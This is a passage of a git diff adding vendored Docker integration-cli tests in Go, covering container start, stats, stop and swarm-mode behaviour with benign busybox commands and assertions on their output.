dockerCmdWithStdoutStderr(c, "run", "-d", "busybox", "sh", "-c", "sleep 2; exit 1") + out = strings.TrimSpace(out) + + // make sure the container has exited before 
trying the "start -a" + dockerCmd(c, "wait", out) + + startOut, exitCode, err := dockerCmdWithError("start", "-a", out) + // start command should fail + c.Assert(err, checker.NotNil, check.Commentf("startOut: %s", startOut)) + // start -a did not respond with proper exit code + c.Assert(exitCode, checker.Equals, 1, check.Commentf("startOut: %s", startOut)) + +} + +func (s *DockerSuite) TestStartAttachSilent(c *check.C) { + name := "teststartattachcorrectexitcode" + dockerCmd(c, "run", "--name", name, "busybox", "echo", "test") + + // make sure the container has exited before trying the "start -a" + dockerCmd(c, "wait", name) + + startOut, _ := dockerCmd(c, "start", "-a", name) + // start -a produced unexpected output + c.Assert(startOut, checker.Equals, "test\n") +} + +func (s *DockerSuite) TestStartRecordError(c *check.C) { + // TODO Windows CI: Requires further porting work. Should be possible. + testRequires(c, DaemonIsLinux) + // when container runs successfully, we should not have state.Error + dockerCmd(c, "run", "-d", "-p", "9999:9999", "--name", "test", "busybox", "top") + stateErr := inspectField(c, "test", "State.Error") + // Expected to not have state error + c.Assert(stateErr, checker.Equals, "") + + // Expect this to fail and records error because of ports conflict + out, _, err := dockerCmdWithError("run", "-d", "--name", "test2", "-p", "9999:9999", "busybox", "top") + // err shouldn't be nil because docker run will fail + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + + stateErr = inspectField(c, "test2", "State.Error") + c.Assert(stateErr, checker.Contains, "port is already allocated") + + // Expect the conflict to be resolved when we stop the initial container + dockerCmd(c, "stop", "test") + dockerCmd(c, "start", "test2") + stateErr = inspectField(c, "test2", "State.Error") + // Expected to not have state error but got one + c.Assert(stateErr, checker.Equals, "") +} + +func (s *DockerSuite) TestStartPausedContainer(c *check.C) { + 
// Windows does not support pausing containers + testRequires(c, IsPausable) + defer unpauseAllContainers() + + runSleepingContainer(c, "-d", "--name", "testing") + + dockerCmd(c, "pause", "testing") + + out, _, err := dockerCmdWithError("start", "testing") + // an error should have been shown that you cannot start paused container + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // an error should have been shown that you cannot start paused container + c.Assert(out, checker.Contains, "Cannot start a paused container, try unpause instead.") +} + +func (s *DockerSuite) TestStartMultipleContainers(c *check.C) { + // Windows does not support --link + testRequires(c, DaemonIsLinux) + // run a container named 'parent' and create two container link to `parent` + dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top") + + for _, container := range []string{"child_first", "child_second"} { + dockerCmd(c, "create", "--name", container, "--link", "parent:parent", "busybox", "top") + } + + // stop 'parent' container + dockerCmd(c, "stop", "parent") + + out := inspectField(c, "parent", "State.Running") + // Container should be stopped + c.Assert(out, checker.Equals, "false") + + // start all the three containers, container `child_first` start first which should be failed + // container 'parent' start second and then start container 'child_second' + expOut := "Cannot link to a non running container" + expErr := "failed to start containers: [child_first]" + out, _, err := dockerCmdWithError("start", "child_first", "parent", "child_second") + // err shouldn't be nil because start will fail + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // output does not correspond to what was expected + if !(strings.Contains(out, expOut) || strings.Contains(err.Error(), expErr)) { + c.Fatalf("Expected out: %v with err: %v but got out: %v with err: %v", expOut, expErr, out, err) + } + + for container, expected := range map[string]string{"parent": 
"true", "child_first": "false", "child_second": "true"} { + out := inspectField(c, container, "State.Running") + // Container running state wrong + c.Assert(out, checker.Equals, expected) + } +} + +func (s *DockerSuite) TestStartAttachMultipleContainers(c *check.C) { + // run multiple containers to test + for _, container := range []string{"test1", "test2", "test3"} { + runSleepingContainer(c, "--name", container) + } + + // stop all the containers + for _, container := range []string{"test1", "test2", "test3"} { + dockerCmd(c, "stop", container) + } + + // test start and attach multiple containers at once, expected error + for _, option := range []string{"-a", "-i", "-ai"} { + out, _, err := dockerCmdWithError("start", option, "test1", "test2", "test3") + // err shouldn't be nil because start will fail + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // output does not correspond to what was expected + c.Assert(out, checker.Contains, "You cannot start and attach multiple containers at once.") + } + + // confirm the state of all the containers be stopped + for container, expected := range map[string]string{"test1": "false", "test2": "false", "test3": "false"} { + out := inspectField(c, container, "State.Running") + // Container running state wrong + c.Assert(out, checker.Equals, expected) + } +} + +// Test case for #23716 +func (s *DockerSuite) TestStartAttachWithRename(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "create", "-t", "--name", "before", "busybox") + go func() { + c.Assert(waitRun("before"), checker.IsNil) + dockerCmd(c, "rename", "before", "after") + dockerCmd(c, "stop", "--time=2", "after") + }() + _, stderr, _, _ := runCommandWithStdoutStderr(exec.Command(dockerBinary, "start", "-a", "before")) + c.Assert(stderr, checker.Not(checker.Contains), "No such container") +} + +func (s *DockerSuite) TestStartReturnCorrectExitCode(c *check.C) { + dockerCmd(c, "create", "--restart=on-failure:2", "--name", "withRestart", 
"busybox", "sh", "-c", "exit 11") + dockerCmd(c, "create", "--rm", "--name", "withRm", "busybox", "sh", "-c", "exit 12") + + _, exitCode, err := dockerCmdWithError("start", "-a", "withRestart") + c.Assert(err, checker.NotNil) + c.Assert(exitCode, checker.Equals, 11) + _, exitCode, err = dockerCmdWithError("start", "-a", "withRm") + c.Assert(err, checker.NotNil) + c.Assert(exitCode, checker.Equals, 12) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go new file mode 100644 index 0000000000..5cb1a3ea02 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go @@ -0,0 +1,159 @@ +package main + +import ( + "bufio" + "os/exec" + "regexp" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestStatsNoStream(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + statsCmd := exec.Command(dockerBinary, "stats", "--no-stream", id) + type output struct { + out []byte + err error + } + + ch := make(chan output) + go func() { + out, err := statsCmd.Output() + ch <- output{out, err} + }() + + select { + case outerr := <-ch: + c.Assert(outerr.err, checker.IsNil, check.Commentf("Error running stats: %v", outerr.err)) + c.Assert(string(outerr.out), checker.Contains, id) //running container wasn't present in output + case <-time.After(3 * time.Second): + statsCmd.Process.Kill() + c.Fatalf("stats did not return immediately when not streaming") + } +} + +func (s *DockerSuite) TestStatsContainerNotFound(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + + out, _, err := dockerCmdWithError("stats", "notfound") + c.Assert(err, checker.NotNil) + c.Assert(out, 
checker.Contains, "No such container: notfound", check.Commentf("Expected to fail on not found container stats, got %q instead", out)) + + out, _, err = dockerCmdWithError("stats", "--no-stream", "notfound") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "No such container: notfound", check.Commentf("Expected to fail on not found container stats with --no-stream, got %q instead", out)) +} + +func (s *DockerSuite) TestStatsAllRunningNoStream(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id1 := strings.TrimSpace(out)[:12] + c.Assert(waitRun(id1), check.IsNil) + out, _ = dockerCmd(c, "run", "-d", "busybox", "top") + id2 := strings.TrimSpace(out)[:12] + c.Assert(waitRun(id2), check.IsNil) + out, _ = dockerCmd(c, "run", "-d", "busybox", "top") + id3 := strings.TrimSpace(out)[:12] + c.Assert(waitRun(id3), check.IsNil) + dockerCmd(c, "stop", id3) + + out, _ = dockerCmd(c, "stats", "--no-stream") + if !strings.Contains(out, id1) || !strings.Contains(out, id2) { + c.Fatalf("Expected stats output to contain both %s and %s, got %s", id1, id2, out) + } + if strings.Contains(out, id3) { + c.Fatalf("Did not expect %s in stats, got %s", id3, out) + } + + // check output contains real data, but not all zeros + reg, _ := regexp.Compile("[1-9]+") + // split output with "\n", outLines[1] is id2's output + // outLines[2] is id1's output + outLines := strings.Split(out, "\n") + // check stat result of id2 contains real data + realData := reg.Find([]byte(outLines[1][12:])) + c.Assert(realData, checker.NotNil, check.Commentf("stat result are empty: %s", out)) + // check stat result of id1 contains real data + realData = reg.Find([]byte(outLines[2][12:])) + c.Assert(realData, checker.NotNil, check.Commentf("stat result are empty: %s", out)) +} + +func (s *DockerSuite) TestStatsAllNoStream(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + + 
out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id1 := strings.TrimSpace(out)[:12] + c.Assert(waitRun(id1), check.IsNil) + dockerCmd(c, "stop", id1) + out, _ = dockerCmd(c, "run", "-d", "busybox", "top") + id2 := strings.TrimSpace(out)[:12] + c.Assert(waitRun(id2), check.IsNil) + + out, _ = dockerCmd(c, "stats", "--all", "--no-stream") + if !strings.Contains(out, id1) || !strings.Contains(out, id2) { + c.Fatalf("Expected stats output to contain both %s and %s, got %s", id1, id2, out) + } + + // check output contains real data, but not all zeros + reg, _ := regexp.Compile("[1-9]+") + // split output with "\n", outLines[1] is id2's output + outLines := strings.Split(out, "\n") + // check stat result of id2 contains real data + realData := reg.Find([]byte(outLines[1][12:])) + c.Assert(realData, checker.NotNil, check.Commentf("stat result of %s is empty: %s", id2, out)) + // check stat result of id1 contains all zero + realData = reg.Find([]byte(outLines[2][12:])) + c.Assert(realData, checker.IsNil, check.Commentf("stat result of %s should be empty : %s", id1, out)) +} + +func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) { + // Windows does not support stats + testRequires(c, DaemonIsLinux) + + id := make(chan string) + addedChan := make(chan struct{}) + + runSleepingContainer(c, "-d") + statsCmd := exec.Command(dockerBinary, "stats") + stdout, err := statsCmd.StdoutPipe() + c.Assert(err, check.IsNil) + c.Assert(statsCmd.Start(), check.IsNil) + defer statsCmd.Process.Kill() + + go func() { + containerID := <-id + matchID := regexp.MustCompile(containerID) + + scanner := bufio.NewScanner(stdout) + for scanner.Scan() { + switch { + case matchID.MatchString(scanner.Text()): + close(addedChan) + return + } + } + }() + + out, _ := runSleepingContainer(c, "-d") + c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil) + id <- strings.TrimSpace(out)[:12] + + select { + case <-time.After(30 * time.Second): + c.Fatal("failed to observe new container 
created added to stats") + case <-addedChan: + // ignore, done + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go new file mode 100644 index 0000000000..103d01374c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go @@ -0,0 +1,17 @@ +package main + +import ( + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestStopContainerWithRestartPolicyAlways(c *check.C) { + dockerCmd(c, "run", "--name", "verifyRestart1", "-d", "--restart=always", "busybox", "false") + dockerCmd(c, "run", "--name", "verifyRestart2", "-d", "--restart=always", "busybox", "false") + + c.Assert(waitRun("verifyRestart1"), checker.IsNil) + c.Assert(waitRun("verifyRestart2"), checker.IsNil) + + dockerCmd(c, "stop", "verifyRestart1") + dockerCmd(c, "stop", "verifyRestart2") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go new file mode 100644 index 0000000000..8eae162cba --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go @@ -0,0 +1,1254 @@ +// +build !windows + +package main + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "path/filepath" + "strings" + "time" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/libnetwork/driverapi" + "github.com/docker/libnetwork/ipamapi" + remoteipam "github.com/docker/libnetwork/ipams/remote/api" + "github.com/go-check/check" + "github.com/vishvananda/netlink" +) + +func (s *DockerSwarmSuite) TestSwarmUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + getSpec := func() swarm.Spec { + sw := d.getSwarm(c) + return sw.Spec + } + + out, err := d.Cmd("swarm", "update", 
"--cert-expiry", "30h", "--dispatcher-heartbeat", "11s") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + spec := getSpec() + c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour) + c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 11*time.Second) + + // setting anything under 30m for cert-expiry is not allowed + out, err = d.Cmd("swarm", "update", "--cert-expiry", "15m") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "minimum certificate expiry time") + spec = getSpec() + c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour) +} + +func (s *DockerSwarmSuite) TestSwarmInit(c *check.C) { + d := s.AddDaemon(c, false, false) + + getSpec := func() swarm.Spec { + sw := d.getSwarm(c) + return sw.Spec + } + + out, err := d.Cmd("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + spec := getSpec() + c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour) + c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 11*time.Second) + + c.Assert(d.Leave(true), checker.IsNil) + time.Sleep(500 * time.Millisecond) // https://github.com/docker/swarmkit/issues/1421 + out, err = d.Cmd("swarm", "init") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + spec = getSpec() + c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 90*24*time.Hour) + c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 5*time.Second) +} + +func (s *DockerSwarmSuite) TestSwarmInitIPv6(c *check.C) { + testRequires(c, IPv6) + d1 := s.AddDaemon(c, false, false) + out, err := d1.Cmd("swarm", "init", "--listen-addr", "::1") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + d2 := s.AddDaemon(c, false, false) + out, err = d2.Cmd("swarm", "join", "::1") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + out, err = d2.Cmd("info") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) 
+ c.Assert(out, checker.Contains, "Swarm: active") +} + +func (s *DockerSwarmSuite) TestSwarmInitUnspecifiedAdvertiseAddr(c *check.C) { + d := s.AddDaemon(c, false, false) + out, err := d.Cmd("swarm", "init", "--advertise-addr", "0.0.0.0") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "advertise address must be a non-zero IP address") +} + +func (s *DockerSwarmSuite) TestSwarmIncompatibleDaemon(c *check.C) { + // init swarm mode and stop a daemon + d := s.AddDaemon(c, true, true) + info, err := d.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(d.Stop(), checker.IsNil) + + // start a daemon with --cluster-store and --cluster-advertise + err = d.Start("--cluster-store=consul://consuladdr:consulport/some/path", "--cluster-advertise=1.1.1.1:2375") + c.Assert(err, checker.NotNil) + content, _ := ioutil.ReadFile(d.logFile.Name()) + c.Assert(string(content), checker.Contains, "--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode") + + // start a daemon with --live-restore + err = d.Start("--live-restore") + c.Assert(err, checker.NotNil) + content, _ = ioutil.ReadFile(d.logFile.Name()) + c.Assert(string(content), checker.Contains, "--live-restore daemon configuration is incompatible with swarm mode") + // restart for teardown + c.Assert(d.Start(), checker.IsNil) +} + +// Test case for #24090 +func (s *DockerSwarmSuite) TestSwarmNodeListHostname(c *check.C) { + d := s.AddDaemon(c, true, true) + + // The first line should contain "HOSTNAME" + out, err := d.Cmd("node", "ls") + c.Assert(err, checker.IsNil) + c.Assert(strings.Split(out, "\n")[0], checker.Contains, "HOSTNAME") +} + +func (s *DockerSwarmSuite) TestSwarmServiceTemplatingHostname(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("service", "create", "--name", "test", "--hostname", "{{.Service.Name}}-{{.Task.Slot}}", "busybox", "top") + c.Assert(err, 
checker.IsNil, check.Commentf(out)) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + containers := d.activeContainers() + out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.Config.Hostname}}", containers[0]) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.Split(out, "\n")[0], checker.Equals, "test-1", check.Commentf("hostname with templating invalid")) +} + +// Test case for #24270 +func (s *DockerSwarmSuite) TestSwarmServiceListFilter(c *check.C) { + d := s.AddDaemon(c, true, true) + + name1 := "redis-cluster-md5" + name2 := "redis-cluster" + name3 := "other-cluster" + out, err := d.Cmd("service", "create", "--name", name1, "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("service", "create", "--name", name2, "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("service", "create", "--name", name3, "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + filter1 := "name=redis-cluster-md5" + filter2 := "name=redis-cluster" + + // We search checker.Contains with `name+" "` to prevent prefix only. 
+ out, err = d.Cmd("service", "ls", "--filter", filter1) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name1+" ") + c.Assert(out, checker.Not(checker.Contains), name2+" ") + c.Assert(out, checker.Not(checker.Contains), name3+" ") + + out, err = d.Cmd("service", "ls", "--filter", filter2) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name1+" ") + c.Assert(out, checker.Contains, name2+" ") + c.Assert(out, checker.Not(checker.Contains), name3+" ") + + out, err = d.Cmd("service", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name1+" ") + c.Assert(out, checker.Contains, name2+" ") + c.Assert(out, checker.Contains, name3+" ") +} + +func (s *DockerSwarmSuite) TestSwarmNodeListFilter(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("node", "inspect", "--format", "{{ .Description.Hostname }}", "self") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + name := strings.TrimSpace(out) + + filter := "name=" + name[:4] + + out, err = d.Cmd("node", "ls", "--filter", filter) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + + out, err = d.Cmd("node", "ls", "--filter", "name=none") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) +} + +func (s *DockerSwarmSuite) TestSwarmNodeTaskListFilter(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "redis-cluster-md5" + out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. 
+ waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 3) + + filter := "name=redis-cluster" + + out, err = d.Cmd("node", "ps", "--filter", filter, "self") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name+".1") + c.Assert(out, checker.Contains, name+".2") + c.Assert(out, checker.Contains, name+".3") + + out, err = d.Cmd("node", "ps", "--filter", "name=none", "self") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name+".1") + c.Assert(out, checker.Not(checker.Contains), name+".2") + c.Assert(out, checker.Not(checker.Contains), name+".3") +} + +// Test case for #25375 +func (s *DockerSwarmSuite) TestSwarmPublishAdd(c *check.C) { + d := s.AddDaemon(c, true, true) + + testCases := []struct { + name string + publishAdd []string + ports string + }{ + { + name: "simple-syntax", + publishAdd: []string{ + "80:80", + "80:80", + "80:80", + "80:20", + }, + ports: "[{ tcp 80 80 ingress}]", + }, + { + name: "complex-syntax", + publishAdd: []string{ + "target=90,published=90,protocol=tcp,mode=ingress", + "target=90,published=90,protocol=tcp,mode=ingress", + "target=90,published=90,protocol=tcp,mode=ingress", + "target=30,published=90,protocol=tcp,mode=ingress", + }, + ports: "[{ tcp 90 90 ingress}]", + }, + } + + for _, tc := range testCases { + out, err := d.Cmd("service", "create", "--name", tc.name, "--label", "x=y", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[0], tc.name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[1], tc.name) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[2], "--publish-add", tc.publishAdd[3], 
tc.name) + c.Assert(err, checker.NotNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.EndpointSpec.Ports }}", tc.name) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, tc.ports) + } +} + +func (s *DockerSwarmSuite) TestSwarmServiceWithGroup(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "top" + out, err := d.Cmd("service", "create", "--name", name, "--user", "root:root", "--group", "wheel", "--group", "audio", "--group", "staff", "--group", "777", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + + out, err = d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + container := strings.TrimSpace(out) + + out, err = d.Cmd("exec", container, "id") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "uid=0(root) gid=0(root) groups=10(wheel),29(audio),50(staff),777") +} + +func (s *DockerSwarmSuite) TestSwarmContainerAutoStart(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("run", "-id", "--restart=always", "--net=foo", "--name=test", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + out, err = d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + d.Restart() + + out, err = d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") +} 
+ +func (s *DockerSwarmSuite) TestSwarmContainerEndpointOptions(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + _, err = d.Cmd("run", "-d", "--net=foo", "--name=first", "--net-alias=first-alias", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + _, err = d.Cmd("run", "-d", "--net=foo", "--name=second", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // ping first container and its alias + _, err = d.Cmd("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil, check.Commentf(out)) + _, err = d.Cmd("exec", "second", "ping", "-c", "1", "first-alias") + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestSwarmContainerAttachByNetworkId(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "testnet") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + networkID := strings.TrimSpace(out) + + out, err = d.Cmd("run", "-d", "--net", networkID, "busybox", "top") + c.Assert(err, checker.IsNil) + cID := strings.TrimSpace(out) + d.waitRun(cID) + + _, err = d.Cmd("rm", "-f", cID) + c.Assert(err, checker.IsNil) + + out, err = d.Cmd("network", "rm", "testnet") + c.Assert(err, checker.IsNil) + + checkNetwork := func(*check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("network", "ls") + c.Assert(err, checker.IsNil) + return out, nil + } + + waitAndAssert(c, 3*time.Second, checkNetwork, checker.Not(checker.Contains), "testnet") +} + +func (s *DockerSwarmSuite) TestOverlayAttachable(c *check.C) { + d := s.AddDaemon(c, true, true) + + out, err := d.Cmd("network", "create", "-d", "overlay", "--attachable", "ovnet") + c.Assert(err, checker.IsNil, 
check.Commentf(out)) + + // validate attachable + out, err = d.Cmd("network", "inspect", "--format", "{{json .Attachable}}", "ovnet") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "true") + + // validate containers can attache to this overlay network + out, err = d.Cmd("run", "-d", "--network", "ovnet", "--name", "c1", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // redo validation, there was a bug that the value of attachable changes after + // containers attach to the network + out, err = d.Cmd("network", "inspect", "--format", "{{json .Attachable}}", "ovnet") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "true") +} + +func (s *DockerSwarmSuite) TestOverlayAttachableOnSwarmLeave(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create an attachable swarm network + nwName := "attovl" + out, err := d.Cmd("network", "create", "-d", "overlay", "--attachable", nwName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Connect a container to the network + out, err = d.Cmd("run", "-d", "--network", nwName, "--name", "c1", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Leave the swarm + err = d.Leave(true) + c.Assert(err, checker.IsNil) + + // Check the container is disconnected + out, err = d.Cmd("inspect", "c1", "--format", "{{.NetworkSettings.Networks."+nwName+"}}") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "") + + // Check the network is gone + out, err = d.Cmd("network", "ls", "--format", "{{.Name}}") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), nwName) +} + +func (s *DockerSwarmSuite) TestSwarmRemoveInternalNetwork(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "ingress" + out, err := d.Cmd("network", "rm", name) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, 
name) + c.Assert(strings.TrimSpace(out), checker.Contains, "is a pre-defined network and cannot be removed") +} + +// Test case for #24108, also the case from: +// https://github.com/docker/docker/pull/24620#issuecomment-233715656 +func (s *DockerSwarmSuite) TestSwarmTaskListFilter(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "redis-cluster-md5" + out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + filter := "name=redis-cluster" + + checkNumTasks := func(*check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("service", "ps", "--filter", filter, name) + c.Assert(err, checker.IsNil) + return len(strings.Split(out, "\n")) - 2, nil // includes header and nl in last line + } + + // wait until all tasks have been created + waitAndAssert(c, defaultReconciliationTimeout, checkNumTasks, checker.Equals, 3) + + out, err = d.Cmd("service", "ps", "--filter", filter, name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name+".1") + c.Assert(out, checker.Contains, name+".2") + c.Assert(out, checker.Contains, name+".3") + + out, err = d.Cmd("service", "ps", "--filter", "name="+name+".1", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name+".1") + c.Assert(out, checker.Not(checker.Contains), name+".2") + c.Assert(out, checker.Not(checker.Contains), name+".3") + + out, err = d.Cmd("service", "ps", "--filter", "name=none", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name+".1") + c.Assert(out, checker.Not(checker.Contains), name+".2") + c.Assert(out, checker.Not(checker.Contains), name+".3") + + name = "redis-cluster-sha1" + out, err = d.Cmd("service", "create", "--name", name, "--mode=global", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + waitAndAssert(c, 
defaultReconciliationTimeout, checkNumTasks, checker.Equals, 1) + + filter = "name=redis-cluster" + out, err = d.Cmd("service", "ps", "--filter", filter, name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + + out, err = d.Cmd("service", "ps", "--filter", "name="+name, name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + + out, err = d.Cmd("service", "ps", "--filter", "name=none", name) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) +} + +func (s *DockerSwarmSuite) TestPsListContainersFilterIsTask(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create a bare container + out, err := d.Cmd("run", "-d", "--name=bare-container", "busybox", "top") + c.Assert(err, checker.IsNil) + bareID := strings.TrimSpace(out)[:12] + // Create a service + name := "busybox-top" + out, err = d.Cmd("service", "create", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. 
